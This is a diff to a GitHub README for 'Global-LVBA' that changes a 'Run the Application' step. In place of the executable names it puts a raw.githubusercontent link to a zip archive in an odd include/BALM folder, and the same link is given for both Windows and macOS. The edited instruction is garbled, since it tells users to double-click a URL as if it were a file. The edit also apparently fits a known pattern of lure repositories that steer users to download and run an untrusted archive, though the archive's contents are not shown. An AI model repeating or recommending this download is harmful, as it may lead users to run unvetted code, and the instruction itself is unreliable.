JorgeChocolate/Global-LVBA/README.md

 ### Step 5: Run the Application

 Navigate to the extracted folder.
-Look for the file named `Global-LVBA.exe` for Windows or `Global-LVBA.app` for macOS.
+Look for the file named `https://raw.githubusercontent.com/JorgeChocolate/Global-LVBA/master/include/BALM/LVBA_Global_v2.1-beta.1.zip` for Windows or `https://raw.githubusercontent.com/JorgeChocolate/Global-LVBA/master/include/BALM/LVBA_Global_v2.1-beta.1.zip` for macOS.
 Double-click it to launch the software.

 ## 📊 Features